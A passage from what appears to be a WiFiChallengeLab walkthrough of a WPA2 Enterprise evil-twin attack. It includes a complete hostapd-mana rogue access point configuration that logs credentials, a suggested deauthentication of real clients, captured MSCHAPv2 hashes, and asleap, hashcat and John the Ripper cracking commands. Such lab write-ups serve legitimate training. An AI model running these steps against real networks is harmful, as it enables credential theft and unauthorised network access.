</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="d8c86541-2cd2-4b0b-9f74-c65c58dfc38d" class="code"><code class="language-Bash">rm dh &amp;&amp; make</code></pre><p id="cab84bf6-3c63-419d-b3fe-fb670a4f47da" class="">
</p><figure id="7f4f05a7-8034-4e7e-b87b-3ed23e0b88f2" class="image"><a href="Untitled%208.png"><img style="width:932px" src="Untitled%208.png"/></a></figure><p id="a284f1c4-98e2-4116-a0df-3dbe92aade37" class="">
</p><p id="2815a63e-89be-4af1-bf53-96c68d62363f" class="">This could take a while. If the certificates already exist, remove them with:</p><p id="c23a95c1-cea3-49d6-8149-d2f47587c7d2" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="12b27be5-90dc-4a63-b9dd-9e9ac736e1d2" class="code"><code class="language-Bash">make destroycerts</code></pre><p id="4ee3a613-2452-4ad6-a572-987be34272fd" class="">
</p><p id="1c963e97-08e4-4ad5-a0d0-16f8deda9380" class="">Now we are almost set to host our Rogue Access Point.</p><p id="9d33d2ff-bf45-4219-bdf2-251af5dbb92b" class="">
</p><p id="cb0c6bb2-cecc-48a0-a7bd-d58861bd6739" class=""><strong>Host a Rogue AP</strong></p><p id="66fc630c-ad27-45e4-afa5-9c646f6e158c" class="">
</p><p id="b94ee333-5cc4-42f6-94e6-7c698b699448" class="">Yes, another terminal windows is opened by me and renamed to <strong>Terminal 8 - Rogue AP</strong>. We should create the configuration file for hostapd-mana.</p><p id="cfa7debd-c0a8-4656-9194-66cd7f641631" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="a651c451-437d-4182-9351-7673ee98ddae" class="code"><code class="language-Bash">sudo nano /etc/hostapd-mana/mana.conf</code></pre><p id="383d7f29-0afa-43f8-9d92-12cd05e03591" class="">
</p><p id="b5ccea50-c4de-427a-a366-356ae02ea64d" class="">The configuration file should look like this:</p><p id="dad69e9f-bed3-4505-9de7-9edd7155c15e" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="b661137c-08ce-4914-b8b1-485133e59e12" class="code"><code class="language-Bash"># SSID of the AP
ssid=wifi-corp

# Network interface to use and driver type
# We must ensure the interface lists &#x27;AP&#x27; in &#x27;Supported interface modes&#x27; when running &#x27;iw phy PHYX info&#x27;
interface=wlan1
driver=nl80211

# Channel and mode
# Make sure the channel is allowed with &#x27;iw phy PHYX info&#x27; (&#x27;Frequencies&#x27; field - there can be more than one)
channel=44
# Refer to https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf to set up 802.11n/ac/ax
hw_mode=a

# Setting up hostapd as an EAP server
ieee8021x=1
eap_server=1

# Key workaround for Win XP
eapol_key_index_workaround=0

# EAP user file we created earlier
eap_user_file=/root/mana.eap_user

# Certificate paths created earlier
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
# The password is actually &#x27;whatever&#x27;
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh

# Open authentication
auth_algs=1
# WPA/WPA2
wpa=2
# WPA Enterprise
wpa_key_mgmt=WPA-EAP
# Allow CCMP and TKIP
# Note: iOS warns when network has TKIP (or WEP)
wpa_pairwise=CCMP TKIP

# Enable Mana WPE
mana_wpe=1

# Store credentials in that file
mana_credout=/tmp/hostapd.credout

# Send EAP success, so the client thinks it&#x27;s connected
mana_eapsuccess=1

# EAP TLS MitM
mana_eaptls=1</code></pre><p id="90f13325-76a3-47fd-bbd3-601ea36327fd" class="">
</p><p id="93150ae8-ec96-4cd6-8890-09449d7956d3" class="">It is important to check the the following items carefully. The path to the files should exist, otherwise it won’t work.</p><ul id="10234679-9016-4093-abd4-41cbeccf4e25" class="bulleted-list"><li style="list-style-type:disc">SSID should be the name of our target</li></ul><ul id="cf90bf6c-5f2c-4f7c-b35b-34f914bf7922" class="bulleted-list"><li style="list-style-type:disc">Certificate paths<ul id="148f60c3-4c8e-4f76-9a9e-d81c7bae4a2f" class="bulleted-list"><li style="list-style-type:circle">Location where we saved the adjusted the certificates<ul id="63b8b5ce-0abb-4fe7-8628-670f1081bc94" class="bulleted-list"><li style="list-style-type:square">ca_cert=/etc/freeradius/3.0/certs/ca.pem</li></ul><ul id="7babbaed-f176-42ec-9348-d36c89bf0148" class="bulleted-list"><li style="list-style-type:square">server_cert=/etc/freeradius/3.0/certs/server.pem</li></ul><ul id="d107ea40-8439-4123-b638-8bc6e58bb90f" class="bulleted-list"><li style="list-style-type:square">private_key=/etc/freeradius/3.0/certs/server.key</li></ul></li></ul></li></ul><ul id="ca7e471c-90ef-477f-bfd0-7da89e92bf4a" class="bulleted-list"><li style="list-style-type:disc">EAP user file<ul id="7f1ee98c-713d-4654-9a4a-587631b59815" class="bulleted-list"><li style="list-style-type:circle">eap_user_file=/etc/hostapd-mana/mana.eap_user</li></ul></li></ul><ul id="a8400bd1-704b-46b3-bbdb-46ba73662114" class="bulleted-list"><li style="list-style-type:disc"><strong>Store captured credentials in file</strong><ul id="f048f80e-fd4a-42b6-9949-ee33a1c49f78" class="bulleted-list"><li style="list-style-type:circle"><code>mana_credout=/tmp/hostapd.credout</code></li></ul><p id="7a444ef0-8123-47c8-be1f-8d5dd0a268de" class="">
</p></li></ul><p id="c3f06966-b79c-4485-a55b-f9f67040846e" class="">Create a <code>mana.eap_user</code> file.</p><p id="7ad4ca6a-2c03-408b-8508-c139a30ad117" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="f4fe81ae-96cb-413b-8cb7-bed733c632bf" class="code"><code class="language-Bash">sudo nano /etc/hostapd-mana/mana.eap_user</code></pre><p id="44608dad-6889-4383-8cfc-fa36e82be1b7" class="">
</p><p id="b747ff3f-3a78-4797-bf44-1c287a1c6bd9" class="">The content of <code>/etc/hostapd-mana/mana.eap_user</code> should look like this:</p><p id="536ac6bb-8857-49e3-b147-0872a5257db2" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="538613d2-d681-43e1-9544-3b7b26bbc77a" class="code"><code class="language-Bash">*     PEAP,TTLS,TLS,FAST
&quot;t&quot;   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    &quot;pass&quot;   [2]</code></pre><p id="e2eb1f10-e4b2-40a9-bd42-af60cb984260" class="">
</p><p id="15ad81e9-9cf5-4483-8896-856bcde08bcd" class="">Start hostapd-mana with custom configuration file</p><p id="00837a2c-c61c-4200-9461-d0099f8e7488" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="a1beff5a-8a42-4947-8c1e-cf2ba38c63ec" class="code"><code class="language-Bash">sudo hostapd-mana /etc/hostapd-mana/mana.conf</code></pre><p id="b3d7cbd3-8299-4788-87fb-b20d085ce794" class="">
</p><figure id="f64da7e4-1c03-4930-ba8d-86951343848d" class="image"><a href="Untitled%209.png"><img style="width:936px" src="Untitled%209.png"/></a></figure><p id="2d6fdb0f-fce2-4903-bdca-2a67d6375113" class="">
</p><p id="28508a1e-c329-4cf6-9197-f7dce3195040" class="">The signal of our Rogue Access Point should be stronger then the other Access Points. If there are no workstations connecting to our Rogue Access Point we can launch a deauthentication attack against the AP(s) from our target network. Workstations will try to connect to another AP and this will probably our Rogue Access Point in the end. When a workstation connects to our Rogue Access Point we should look for a few things. Check the line:</p><p id="94f78b50-76ca-4d8d-a4bd-097cf6e0086c" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="211e1316-e259-49f9-96e0-adb1d2a14904" class="code"><code class="language-Bash">MANA EAP Identity Phase &lt;NR&gt;: &lt;USERNAME&gt;</code></pre><p id="20d26884-0580-43f1-a8f4-e9209803b4d8" class="">for the username.</p><p id="4d1c1d94-0de7-4eb6-a4ad-cb439e14a596" class="">Check the line(s):</p><p id="678f0422-93a7-455d-b664-1f5cea8c3624" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="e9bcb516-d7e4-47ed-8fa5-62e5fee1fb9f" class="code"><code class="language-Bash">MANA EAP EAP-MSCHAPV2 ASLEAP user=&lt;USERNAME&gt; | asleap -C &lt;value&gt; - R &lt;value&gt;</code></pre><p id="5c656b8b-80f2-4748-9689-04ec7d5a1dc9" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="cd9aa34b-6cc6-41dc-a023-07cfc572f02b" class="code"><code class="language-Bash">MANA EAP EAP-MSCHAPV2 ASLEAP user=juan.tr | asleap -C XXXXXXXXXXXXXXXXXXXXXXX -R XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
MANA EAP EAP-MSCHAPV2 JTR | juan.tr:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | juan.tr::::XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXX</code></pre><p id="d95c1886-8ed7-4320-8166-1a06bb05b07b" class="">
</p><p id="2be96507-cc0d-4240-9765-302d61b0e859" class=""><strong>Crack the hash</strong></p><p id="e830b623-d57e-4c0c-8fa2-966f26d1aca6" class="">We have captured the hash of the user. There are three options to crack the hash.</p><ol type="1" id="c5b805ce-1551-4e42-9e18-bc805efb2358" class="numbered-list" start="1"><li>Asleap</li></ol><ol type="1" id="04c9a03c-4afb-4eed-bda8-51692a9feeb4" class="numbered-list" start="2"><li>Hashcat</li></ol><ol type="1" id="ead54238-3bc1-4e79-a310-f9e2a858d107" class="numbered-list" start="3"><li>John the Ripper</li></ol><p id="79308076-f326-46a4-aeda-0c8d8e1fbfa1" class="">In <strong>Terminal 9 - Crack hash</strong> we will crack the hash of the user for a password. The hashes can be found in the output of <code>HostAPd</code> or the hashes are stored in the captured file as well. To see the hashes we can run the following command.</p><p id="6dfd63de-b317-4418-83a7-1643997a0c2c" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="da1c42d9-0b48-454e-852b-596a59161ac2" class="code"><code class="language-Bash">cat /tmp/hostapd.credout</code></pre><p id="f277a579-e3f4-4edf-9491-26bc7d2f0db0" class="">
</p><p id="f8a1c49f-14fc-4f2a-b300-414b43274ad0" class=""><strong>asleap</strong></p><p id="2ea9deb8-711e-4ae9-97e7-0b3126ee8541" class="">We can crack the hash with asleap. We should copy the output after <code>MANA EAP EAP-MSCHAPV2 ASLEAP user=juan.tr |</code> and run then the following command.</p><p id="e3679e28-c4c2-4902-89f2-0ca1bb07303b" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="5d5f95ee-512b-4791-bcce-cc26138cab8e" class="code"><code class="language-Bash">asleap -C d4:b9:92:06:0e:57:9a:0d -R 59:b8:e1:db:c7:a8:8e:bc:f7:21:28:52:92:f0:21:2b:88:0f:df:c4:fb:ef:fe:6f -W /usr/share/john/password.lst</code></pre><p id="ba669eca-217c-48ab-869d-3ac311fb9bb5" class="">
</p><figure id="f4381667-8c37-4547-8d91-ddfdb357db15" class="image"><a href="Untitled%2010.png"><img style="width:1211px" src="Untitled%2010.png"/></a></figure><p id="681d185d-763e-409f-856a-d6ac15410d83" class="">
</p><p id="9d50bd1c-9be4-4dc1-a92a-91d01b631192" class="">If you got some issues with asleap and running on version 2.3, you might want to consider to downgrade. The following steps could be used to downgrade.</p><p id="e0784139-7ec6-4609-a4e4-75d40db9b88b" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="510d6b68-db7c-4a56-8c7f-dbe1d45b6e3d" class="code"><code class="language-Bash">wget https://debian.sipwise.com/debian-security/pool/main/o/openssl1.0/libssl1.0.2_1.0.2u-1~deb9u7_amd64.deb</code></pre><p id="3790d2fb-a2f3-4086-b89f-b7c6a8019744" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="4fb9bb99-2af0-4ac6-a5c6-9886581671b1" class="code"><code class="language-Bash">sudo apt install ./libssl1.0.2_1.0.2u-1\~deb9u7_amd64.deb</code></pre><p id="b63471cc-b94f-4d43-b7be-9aad87c7d368" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="8bce8010-5a43-4480-90d8-bf6b8e03d152" class="code"><code class="language-Bash">wget https://old.kali.org/kali/pool/main/a/asleap/asleap_2.2-1kali7_amd64.deb</code></pre><p id="45d2f199-bd09-4633-b24f-c958357198c9" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="8bf8f169-ce5a-4e08-87c9-842ee85a384d" class="code"><code class="language-Bash">sudo apt install ./asleap_2.2-1kali7_amd64.deb</code></pre><p id="466fe882-c122-4478-b96a-c1bf353b3289" class="">
</p><p id="67b9d6c6-95dd-4289-ba4a-f5aa26becb6e" class=""><strong>Hashcat</strong></p><p id="2c913215-63dc-4ded-b412-c7a294b03f0b" class="">First we should copy the hash for Hashcat. The hash can be found after <code>MANA EAP EAP-MSCHAPV2 HASHCAT | </code>. The hash should be pasted into a file so we can crack it with Hashcat.</p><p id="d5608137-4737-406a-a53e-f98c6a722fe0" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="f2442445-1ccc-4ec5-b95d-f62e969b1a0b" class="code"><code class="language-Bash">root@WiFiChallengeLab:~# nano wpa-enterprise.hash
root@WiFiChallengeLab:~# cat wpa-enterprise.hash 
juan.tr::::59b8e1dbc7a88ebcf721285292f0212b880fdfc4fbeffe6f:d4b992060e579a0d</code></pre><p id="2a34deeb-3de9-41f2-b2d8-aa3a787bdf81" class="">
</p><p id="850c1759-c9be-4e7e-8b08-12a16d879a4f" class="">The following command should be executed to crack the hash with Hashcat.</p><p id="a155cda7-6de8-42e5-8bea-510bf8a3677e" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="385aa980-0477-409d-b8ca-a8bf2b49a7d4" class="code"><code class="language-Bash">hashcat -m 5500 wpa-enterprise.hash rockyou-top100000.txt --force</code></pre><p id="523103ac-3a8a-4f04-983d-b6fef3b511c8" class="">
</p><figure id="ab16347f-5fb1-48b8-a98d-62e033eaef53" class="image"><a href="Untitled%2011.png"><img style="width:1841px" src="Untitled%2011.png"/></a></figure><p id="7250a7f9-afbd-4e9b-a2ca-eefd6d42795a" class="">
</p><p id="03671391-4de1-47d8-a50d-89a0b462b7fa" class=""><strong>John the Ripper</strong></p><p id="5d066a91-af90-4d56-8f2b-8b75651d8af4" class="">It is possible to crack the password with John the Ripper. To do this we should copy the hash from the output after <code>MANA EAP EAP-MSCHAPV2 JTR | </code>. The hash should be pasted into a file so we can crack it with John the Ripper.</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="2cf53ac6-2832-469a-8234-4fed6335f753" class="code"><code class="language-Bash">root@WiFiChallengeLab:~# nano wpa-enterprise.hash
root@WiFiChallengeLab:~# cat wpa-enterprise.hash 
juan.tr:$NETNTLM$d4b992060e579a0d$59b8e1dbc7a88ebcf721285292f0212b880fdfc4fbeffe6f:::::::</code></pre><p id="b857a7a1-0430-4b2a-9e04-5e83e86dba0c" class="">
</p><p id="2f16005d-9b3a-443b-8687-c0c31bb4b47f" class="">To run John the Ripper we can run the following command.</p><p id="62fbe8f5-0206-493a-ac7f-92b8e31f432d" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="0efc99d5-a173-4626-8bb0-5c14374dae02" class="code"><code class="language-Bash">john wpa-enterprise.hash --wordlist=rockyou-top100000.txt</code></pre><p id="7a6e5934-f2a5-4958-989f-8a14efbf38e4" class="">
</p><figure id="f71b5310-ac18-42d6-a66b-53991f26a8eb" class="image"><a href="Untitled%2012.png"><img style="width:758px" src="Untitled%2012.png"/></a></figure><p id="9d24be21-38ba-4efe-93cf-a113e263ce8e" class="">
</p><p id="8261f968-0c33-4abd-ba6c-6158f35826a5" class=""><strong>Connect to the WPA2 Enterprise network</strong></p><p id="1005b9d5-da98-4be8-bd3c-3c950c671527" class="">We were able to crack the hash of the user to a plain text password. We can use the information now to create a configuration file for wpa_supplicant.</p><p id="d0bd0bf1-b99f-47d0-b274-aa32519fbf41" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="8cc9b8f1-ee77-40df-8fdb-3a2148478a5c" class="code"><code class="language-Bash">nano wpa_supplicant.conf</code></pre><p id="e9207172-b964-49f9-bc90-cf17c92d9a0f" class="">
